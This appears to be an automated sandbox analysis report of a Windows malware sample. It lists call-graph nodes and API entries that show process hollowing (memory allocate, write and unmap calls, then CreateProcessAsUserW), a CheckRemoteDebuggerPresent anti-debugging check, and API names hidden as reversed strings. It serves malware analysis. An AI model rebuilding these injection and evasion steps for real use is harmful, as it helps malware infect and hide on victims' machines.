28954 2b7ac38 28953->28954 28955 2b689d0 4 API calls 28954->28955 28956 2b7acb4 28955->28956 28957 2b689d0 4 API calls 28956->28957 28958 2b7ad30 28957->28958 28959 2b689d0 4 API calls 28958->28959 28960 2b7adac 28959->28960 28961 2b689d0 4 API calls 28960->28961 28962 2b7addf 28961->28962 28963 2b689d0 4 API calls 28962->28963 28964 2b7ae12 28963->28964 28965 2b689d0 4 API calls 28964->28965 28966 2b7ae45 28965->28966 28967 2b689d0 4 API calls 28966->28967 28968 2b7ae78 28967->28968 28969 2b689d0 4 API calls 28968->28969 28970 2b7aeab 28969->28970 28971 2b689d0 4 API calls 28970->28971 28972 2b7aede 28971->28972 28973 2b689d0 4 API calls 28972->28973 28974 2b7af11 28973->28974 28975 2b689d0 4 API calls 28974->28975 28976 2b7af44 28975->28976 28977 2b689d0 4 API calls 28976->28977 28978 2b7af77 28977->28978 28979 2b689d0 4 API calls 28978->28979 28980 2b7afaa 28979->28980 28981 2b689d0 4 API calls 28980->28981 28982 2b7afdd 28981->28982 28983 2b689d0 4 API calls 28982->28983 28984 2b7b010 28983->28984 28985 2b689d0 4 API calls 28984->28985 28986 2b7b043 28985->28986 28987 2b689d0 4 API calls 28986->28987 28988 2b7b076 28987->28988 28989 2b689d0 4 API calls 28988->28989 28990 2b7b0a9 28989->28990 28991 2b689d0 4 API calls 28990->28991 28992 2b7b0dc 28991->28992 28993 2b689d0 4 API calls 28992->28993 28994 2b7b10f 28993->28994 28995 2b689d0 4 API calls 28994->28995 28996 2b7b142 28995->28996 28997 2b689d0 4 API calls 28996->28997 28998 2b7b175 28997->28998 29193 2b68338 28998->29193 29000 2b7b184 29001 2b689d0 4 API calls 29000->29001 29002 2b7b200 29001->29002 29003 2b689d0 4 API calls 29002->29003 29004 2b7b27c 29003->29004 29005 2b689d0 4 API calls 29004->29005 29005->27946 29007 2b688c6 29006->29007 29200 2b68274 29007->29200 29009 2b688f1 29204 2b67d78 29009->29204 29011 2b6891f 29011->27917 29013 2b689e4 29012->29013 29014 2b681cc 2 API calls 29013->29014 29015 2b68a1d 29014->29015 29016 2b68274 GetProcAddress 29015->29016 29017 2b68a36 29016->29017 29018 2b67d78 3 API calls 29017->29018 29019 2b68a95 29018->29019 29020 2b68338 3 API calls 29019->29020 29021 2b68aa4 29020->29021 29021->27922 29024 2b6f759 29022->29024 29023 2b6f786 29023->27948 29024->29023 29025 2b6f774 CheckRemoteDebuggerPresent 29024->29025 29025->29023 29027 2b68d78 29026->29027 29028 2b689d0 4 API calls 29027->29028 29029 2b68dfb 29028->29029 29030 2b689d0 4 API calls 29029->29030 29031 2b68e54 29030->29031 29032 2b6a8b7 29031->29032 29033 2b689d0 4 API calls 29031->29033 29032->28665 29034 2b68ec5 29033->29034 29035 2b689d0 4 API calls 29034->29035 29036 2b68f1e 29035->29036 29036->29032 29037 2b689d0 4 API calls 29036->29037 29038 2b68fa6 29037->29038 29039 2b689d0 4 API calls 29038->29039 29040 2b68fff 29039->29040 29041 2b689d0 4 API calls 29040->29041 29042 2b69084 29041->29042 29043 2b689d0 4 API calls 29042->29043 29044 2b690e3 29043->29044 29045 2b689d0 4 API calls 29044->29045 29046 2b69154 29045->29046 29047 2b689d0 4 API calls 29046->29047 29048 2b691c5 29047->29048 29049 2b689d0 4 API calls 29048->29049 29050 2b69236 29049->29050 29216 2b68788 29050->29216 29052 2b69273 29053 2b692e8 29052->29053 29055 2b689d0 4 API calls 29052->29055 29054 2b689d0 4 API calls 29053->29054 29056 2b69359 29054->29056 29055->29053 29057 2b689d0 4 API calls 29056->29057 29058 2b6938c 29057->29058 29059 2b689d0 4 API calls 29058->29059 29060 2b693fd 29059->29060 29061 2b689d0 4 API calls 29060->29061 29062 2b6946e 29061->29062 29063 2b689d0 4 API calls 29062->29063 29064 2b6950b 29063->29064 29065 2b689d0 4 API calls 29064->29065 29066 2b6957c 29065->29066 29067 2b689d0 4 API calls 29066->29067 29068 2b695ed 29067->29068 29068->29032 29069 2b689d0 4 API calls 29068->29069 29070 2b69680 29069->29070 29071 2b689d0 4 API calls 29070->29071 29072 2b696f1 29071->29072 29073 2b689d0 4 API calls 29072->29073 29074 2b69762 29073->29074 29075 2b689d0 4 API calls 29074->29075 29076 2b697d3 29075->29076 29077 2b689d0 4 API calls 29076->29077 29078 2b69844 29077->29078 29223 2b68400 29078->29223 29080 2b69864 29081 2b69b7f 29080->29081 29082 2b69878 29080->29082 29083 2b689d0 4 API calls 29081->29083 29084 2b689d0 4 API calls 29082->29084 29085 2b69b78 29083->29085 29086 2b698e9 29084->29086 29087 2b689d0 4 API calls 29085->29087 29088 2b689d0 4 API calls 29086->29088 29089 2b69c61 29087->29089 29090 2b6995a 29088->29090 29091 2b689d0 4 API calls 29089->29091 29092 2b689d0 4 API calls 29090->29092 29098 2b69cd2 29091->29098 29093 2b699cb 29092->29093 29230 2b68670 29093->29230 29095 2b699df 29096 2b699e3 29095->29096 29102 2b69a0b 29095->29102 29097 2b67a2c 3 API calls 29096->29097 29104 2b69a04 29097->29104 29099 2b689d0 4 API calls 29098->29099 29100 2b69d43 29099->29100 29101 2b67a2c 3 API calls 29100->29101 29106 2b69d64 29101->29106 29103 2b689d0 4 API calls 29102->29103 29103->29104 29105 2b689d0 4 API calls 29104->29105 29108 2b69aed 29105->29108 29106->29032 29107 2b689d0 4 API calls 29106->29107 29112 2b69de7 29107->29112 29109 2b689d0 4 API calls 29108->29109 29110 2b69b5e 29109->29110 29237 2b67a2c 29110->29237 29113 2b689d0 4 API calls 29112->29113 29114 2b69e58 29113->29114 29115 2b689d0 4 API calls 29114->29115 29116 2b69f34 29115->29116 29117 2b689d0 4 API calls 29116->29117 29118 2b69fa5 29117->29118 29119 2b689d0 4 API calls 29118->29119 29120 2b6a016 29119->29120 29121 2b67d78 3 API calls 29120->29121 29122 2b6a033 29121->29122 29123 2b689d0 4 API calls 29122->29123 29124 2b6a0a4 29123->29124 29125 2b689d0 4 API calls 29124->29125 29126 2b6a115 29125->29126 29127 2b689d0 4 API calls 29126->29127 29128 2b6a186 29127->29128 29129 2b67d78 3 API calls 29128->29129 29130 2b6a1a6 29129->29130 29131 2b689d0 4 API calls 29130->29131 29132 2b6a217 29131->29132 29133 2b689d0 4 API calls 29132->29133 29134 2b6a288 29133->29134 29135 2b689d0 4 API calls 29134->29135 29136 2b6a2f9 29135->29136 29137 2b689d0 4 API calls 29136->29137 29138 2b6a39a 29137->29138 29139 2b689d0 4 API calls 29138->29139 29140 2b6a40b 29139->29140 29141 2b689d0 4 API calls 29140->29141 29142 2b6a47c 29141->29142 29143 2b689d0 4 API calls 29142->29143 29144 2b6a4ed 29143->29144 29145 2b689d0 4 API calls 29144->29145 29146 2b6a573 29145->29146 29147 2b6894c 3 API calls 29146->29147 29148 2b6a587 29147->29148 29149 2b6894c 3 API calls 29148->29149 29150 2b6a59b 29149->29150 29151 2b6894c 3 API calls 29150->29151 29152 2b6a5af 29151->29152 29153 2b689d0 4 API calls 29152->29153 29154 2b6a620 29153->29154 29155 2b6894c 3 API calls 29154->29155 29156 2b6a634 29155->29156 29157 2b6894c 3 API calls 29156->29157 29158 2b6a648 29157->29158 29159 2b6894c 3 API calls 29158->29159 29160 2b6a69a 29159->29160 29161 2b6894c 3 API calls 29160->29161 29162 2b6a6ec 29161->29162 29163 2b6894c 3 API calls 29162->29163 29164 2b6a700 29163->29164 29165 2b6894c 3 API calls 29164->29165 29166 2b6a714 29165->29166 29167 2b6894c 3 API calls 29166->29167 29168 2b6a728 29167->29168 29169 2b6894c 3 API calls 29168->29169 29170 2b6a73c 29169->29170 29171 2b6894c 3 API calls 29170->29171 29172 2b6a78e 29171->29172 29173 2b6894c 3 API calls 29172->29173 29174 2b6a7e0 29173->29174 29175 2b6894c 3 API calls 29174->29175 29176 2b6a832 29175->29176 29177 2b6894c 3 API calls 29176->29177 29178 2b6a884 29177->29178 29179 2b6894c 3 API calls 29178->29179 29180 2b6a8a3 29179->29180 29181 2b6894c 3 API calls 29180->29181 29181->29032 29182->28567 29183->28694 29184->28627 29185->28757 29186->28812 29187->28738 29188->28788 29190 2b68965 29189->29190 29191 2b67d78 3 API calls 29190->29191 29192 2b689a5 29190->29192 29191->29192 29192->28886 29194 2b6835b 29193->29194 29195 2b681cc 2 API calls 29194->29195 29196 2b6838d 29195->29196 29197 2b68274 GetProcAddress 29196->29197 29198 2b68393 FlushInstructionCache 29197->29198 29199 2b683c1 29198->29199 29199->29000 29201 2b68299 29200->29201 29202 2b682cc GetProcAddress 29201->29202 29203 2b682fb 29202->29203 29203->29009 29205 2b67d9d 29204->29205 29211 2b681cc 29205->29211 29207 2b67dcd 29208 2b68274 GetProcAddress 29207->29208 29209 2b67dd3 NtWriteVirtualMemory 29208->29209 29210 2b67e0c 29209->29210 29210->29011 29212 2b681ef 29211->29212 29213 2b68274 GetProcAddress 29212->29213 29214 2b68215 GetModuleHandleA 29213->29214 29215 2b6823b 29214->29215 29215->29207 29217 2b687ab 29216->29217 29218 2b681cc 2 API calls 29217->29218 29219 2b687dd 29218->29219 29220 2b68274 GetProcAddress 29219->29220 29221 2b687e3 CreateProcessAsUserW 29220->29221 29222 2b6882f 29221->29222 29222->29052 29224 2b68425 29223->29224 29225 2b681cc 2 API calls 29224->29225 29226 2b68452 29225->29226 29227 2b68274 GetProcAddress 29226->29227 29228 2b68458 NtReadVirtualMemory 29227->29228 29229 2b68493 29228->29229 29229->29080 29231 2b68695 29230->29231 29232 2b681cc 2 API calls 29231->29232 29233 2b686c2 29232->29233 29234 2b68274 GetProcAddress 29233->29234 29235 2b686c8 NtUnmapViewOfSection 29234->29235 29236 2b686f5 29235->29236 29236->29095 29238 2b67a51 29237->29238 29239 2b681cc 2 API calls 29238->29239 29240 2b67a7e 29239->29240 29241 2b68274 GetProcAddress 29240->29241 29242 2b67a84 NtAllocateVirtualMemory 29241->29242 29243 2b67ac2 29242->29243 29243->29085

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B681CC: GetModuleHandleA.KERNELBASE(?), ref: 02B6821E
                                                                                                                                  • Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9
                                                                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B67A9F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                • API String ID: 421316089-445027087
                                                                                                                                • Opcode ID: 3426682331046e6e0ddbe499db779ae77898b0a1e569c35c399326c5f31b0d1a
                                                                                                                                • Instruction ID: e5bc12b29277788bbffb42a9b1a6e32b52f81698fc2e3bffa806dce358b80a05
                                                                                                                                • Opcode Fuzzy Hash: 3426682331046e6e0ddbe499db779ae77898b0a1e569c35c399326c5f31b0d1a
                                                                                                                                • Instruction Fuzzy Hash: 0F116175640209BFEB00DFA4DC55FEEB7BDEB48714F5084A1B904D7250EA34AA509B60

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B681CC: GetModuleHandleA.KERNELBASE(?), ref: 02B6821E
                                                                                                                                  • Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9
                                                                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B67A9F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                • API String ID: 421316089-445027087
                                                                                                                                • Opcode ID: 6d4db09bf21c6d62214a76c5b19908198ecff72c81cba0794fc870036ef2183e
                                                                                                                                • Instruction ID: 503b14a4ff5a58c29bf9d4b47e2c5c06c710a9d12af6e6dbf0019fbbea8dee93
                                                                                                                                • Opcode Fuzzy Hash: 6d4db09bf21c6d62214a76c5b19908198ecff72c81cba0794fc870036ef2183e
                                                                                                                                • Instruction Fuzzy Hash: A0116175640209BFEB00DFA4DC55FEEB7BDEB48714F5084A1B904D7250EA34AA509B60

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B681CC: GetModuleHandleA.KERNELBASE(?), ref: 02B6821E
                                                                                                                                  • Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9
                                                                                                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B68471
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleMemoryModuleProcReadVirtual
                                                                                                                                • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                • API String ID: 2004920654-737317276
                                                                                                                                • Opcode ID: aa5fff3b3843e93ffc6a610d9a87a5a3efa957609707e8ff6fb3a920621a8106
                                                                                                                                • Instruction ID: 6ad33e79621f1ed7d77b3ce85636fc0c1452b0868a353381f607df209345386e
                                                                                                                                • Opcode Fuzzy Hash: aa5fff3b3843e93ffc6a610d9a87a5a3efa957609707e8ff6fb3a920621a8106
                                                                                                                                • Instruction Fuzzy Hash: E7018075640208AFDB00EFA8DC45FAEB7FDEB4D710F508490F904D7600DA38A9148B20

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B681CC: GetModuleHandleA.KERNELBASE(?), ref: 02B6821E
                                                                                                                                  • Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9
                                                                                                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B67DEC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                                                                                                • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                • API String ID: 4260932595-3542721025
                                                                                                                                • Opcode ID: 43bd846a7c8c3f49da55479043e1e6fe1f238d8eb8434572d358442209ec9e87
                                                                                                                                • Instruction ID: b66398513ac97ad9fe6b47d2a75a8941fac17f15f994b3ca7da4ec0e6474ce7c
                                                                                                                                • Opcode Fuzzy Hash: 43bd846a7c8c3f49da55479043e1e6fe1f238d8eb8434572d358442209ec9e87
                                                                                                                                • Instruction Fuzzy Hash: AD018075640204AFDB00EF98EC45FAAB7FDEB4D714F5088D1B900DB640DA38AD149F60

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B681CC: GetModuleHandleA.KERNELBASE(?), ref: 02B6821E
                                                                                                                                  • Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9
                                                                                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 02B686D5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProcSectionUnmapView
                                                                                                                                • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                • API String ID: 2801472262-2520021413
                                                                                                                                • Opcode ID: 50dc4a7787a205b3d3986658fc6126c5904194b002d5b7f199874c5993eaff11
                                                                                                                                • Instruction ID: 693ed5516d9b42044446d5a41304c81304a2cd15bf8f0af634c31794b3f91d88
                                                                                                                                • Opcode Fuzzy Hash: 50dc4a7787a205b3d3986658fc6126c5904194b002d5b7f199874c5993eaff11
                                                                                                                                • Instruction Fuzzy Hash: D201D634640204BFEB00EFA4EC55FAEB7FEEB48710F5084E0B900DB600EA38A905DE14

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B681CC: GetModuleHandleA.KERNELBASE(?), ref: 02B6821E
                                                                                                                                  • Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9
                                                                                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 02B686D5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProcSectionUnmapView
                                                                                                                                • String ID: ntdll
                                                                                                                                • API String ID: 2801472262-3337577438
                                                                                                                                • Opcode ID: 897912416ed9d42bc7d2b13a651af03c09ed6a10c58ea80576d334bfb1d49c72
                                                                                                                                • Instruction ID: e43845b96aa039231a62087338ce941ae0ce12d7bebc3de2763e7ceffd8561af
                                                                                                                                • Opcode Fuzzy Hash: 897912416ed9d42bc7d2b13a651af03c09ed6a10c58ea80576d334bfb1d49c72
                                                                                                                                • Instruction Fuzzy Hash: C8F09674940204EFDB00FFB4E945AEDB7FAEB48754F5085E5A804DB210EA38AA45DF10

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B681CC: GetModuleHandleA.KERNELBASE(?), ref: 02B6821E
                                                                                                                                  • Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9
                                                                                                                                • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B68814
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressCreateHandleModuleProcProcessUser
                                                                                                                                • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                • API String ID: 4105707577-2353454454
                                                                                                                                • Opcode ID: bc658f81111103d0201b721671443f0c6e5e21e3cf97d428f8b64dd881e1c34c
                                                                                                                                • Instruction ID: 3ec3944ca49169cb10135cdbdcaa94aff0b630c0a79d039ba5760c306ee60646
                                                                                                                                • Opcode Fuzzy Hash: bc658f81111103d0201b721671443f0c6e5e21e3cf97d428f8b64dd881e1c34c
                                                                                                                                • Instruction Fuzzy Hash: 6E11D3B2640248AFEB40EEA8DC45FEA77EDEB0C750F5144A0BA08D7200D638FD559B64

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 12966 2b6f744-2b6f75e call 2b5668c 12969 2b6f760-2b6f772 call 2b56694 12966->12969 12970 2b6f78a-2b6f792 12966->12970 12969->12970 12973 2b6f774-2b6f784 CheckRemoteDebuggerPresent 12969->12973 12973->12970 12974 2b6f786 12973->12974 12974->12970
                                                                                                                                APIs
                                                                                                                                • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B6F77D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                                                                • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                • API String ID: 3662101638-539270669
                                                                                                                                • Opcode ID: 0ab2b5b903f7252d7ee8d0db72627cc49669396f9df81b15b5b4d64e12211b26
                                                                                                                                • Instruction ID: 66a1428c6f17037a21d36516d042824d0b5b0f19469fe8700b0f1de239ee1224
                                                                                                                                • Opcode Fuzzy Hash: 0ab2b5b903f7252d7ee8d0db72627cc49669396f9df81b15b5b4d64e12211b26
                                                                                                                                • Instruction Fuzzy Hash: 1FF0EC70904258BAEB11A7F89C8C7FCFBF9DB05329F6443E0E836625D1E7790640CA51
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B681CC: GetModuleHandleA.KERNELBASE(?), ref: 02B6821E
                                                                                                                                  • Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9
                                                                                                                                • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B683C2), ref: 02B683A4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressCacheFlushHandleInstructionModuleProc
                                                                                                                                • String ID: FlushInstructionCache$Kernel32
                                                                                                                                • API String ID: 2392256011-184458249
                                                                                                                                • Opcode ID: 1dc74eb02c1b040375829037276c986da9fc6ae2be3e0fbd63e6d165327dced3
                                                                                                                                • Instruction ID: ebac7ae5a5e4af0f1f0819bc1510d8dad63c0c23daacf79eaba7018453411bd3
                                                                                                                                • Opcode Fuzzy Hash: 1dc74eb02c1b040375829037276c986da9fc6ae2be3e0fbd63e6d165327dced3
                                                                                                                                • Instruction Fuzzy Hash: 9E018171680304BFEB10EFA4DC55FAA77EDE708B10F6184A0F904D7650DA78AD559B24
                                                                                                                                APIs
                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 02B682D9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc
                                                                                                                                • String ID: Kernel32$sserddAcorPteG
                                                                                                                                • API String ID: 190572456-1372893251
                                                                                                                                • Opcode ID: c232869aba990d9f18db04929400e3b487e82e9d9323e8afe7ed0129cfcbec92
                                                                                                                                • Instruction ID: 1a7e368822440cec5d8fb66b2323c2778332cffe81e88b79efaa7d6d0cf54d88
                                                                                                                                • Opcode Fuzzy Hash: c232869aba990d9f18db04929400e3b487e82e9d9323e8afe7ed0129cfcbec92
                                                                                                                                • Instruction Fuzzy Hash: 8B014F75640314AFEB00EFA4EC55FEEB7FEEB48B10F5184E0B900DB640EA74A945DA24
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B68274: GetProcAddress.KERNEL32(?,?), ref: 02B682D9
                                                                                                                                • GetModuleHandleA.KERNELBASE(?), ref: 02B6821E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000018.00000002.2311938744.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_24_2_2b51000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                • API String ID: 1646373207-1952140341
                                                                                                                                • Opcode ID: f7434142d19014871d46a549609282ce0b93fdfbcda1a74237943d600bcf3f35
                                                                                                                                • Instruction ID: 15c0575565c7d6b129a5cd9c4a8dd95eba5a0e00fb86071dfb4914e1aac1148c
                                                                                                                                • Opcode Fuzzy Hash: f7434142d19014871d46a549609282ce0b93fdfbcda1a74237943d600bcf3f35
                                                                                                                                • Instruction Fuzzy Hash: 69F09671A84704BFEB00EFA4DC15AADF7FDE74A75075148E1B800C7610EA34AE149925

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:27.8%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:32
                                                                                                                                Total number of Limit Nodes:2

                                                                                                                                Callgraph

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000019.00000001.2295576638.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000019.00000001.2295576638.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000019.00000001.2295576638.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_25_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                                • String ID: %s\%s
                                                                                                                                • API String ID: 2742963760-4073750446
                                                                                                                                • Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                                • Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
                                                                                                                                • Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                                • Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000019.00000001.2295576638.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000019.00000001.2295576638.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000019.00000001.2295576638.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_25_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2992075992-0
                                                                                                                                • Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                                • Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
                                                                                                                                • Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                                • Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000019.00000001.2295576638.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000019.00000001.2295576638.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000019.00000001.2295576638.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_25_1_400000_lxsyrsiW.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __getmainargs__set_app_type_controlfpexitmemset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1611591150-0
                                                                                                                                • Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                                • Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
                                                                                                                                • Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                                • Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
